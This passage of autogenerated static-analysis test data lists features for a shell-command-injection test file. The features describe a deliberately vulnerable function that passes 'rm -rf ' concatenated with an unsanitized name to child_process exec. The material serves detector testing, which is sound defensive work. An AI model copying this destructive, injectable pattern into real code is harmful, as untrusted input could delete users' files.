name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | 'arguments' object of anonymous function | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | exceptional return of anonymous function | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | functio ... // OK\\n} | assignedToPropName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | functio ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | functio ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | return of anonymous function | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:33:120:36 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:33:120:36 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:33:120:36 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:33:120:36 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:33:120:36 | name | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:33:120:36 | name | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:33:120:36 | name | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:33:120:36 | name | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:33:120:36 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:33:120:36 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:3 | cp | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:3 | cp | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:8 | cp.exec | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:26 | cp.exec ... + name) | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:5:121:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:5:121:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:5:121:8 | exec | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:5:121:8 | exec | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:5:121:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:18 | "rm -rf " | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:25 | "rm -rf " + name | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:10:121:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:22:121:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:22:121:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:22:121:25 | name | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:22:121:25 | name | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:22:121:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:22:121:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:6:123:22 | !isSafeName(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:6:123:22 | !isSafeName(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:6:123:22 | !isSafeName(name) | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| 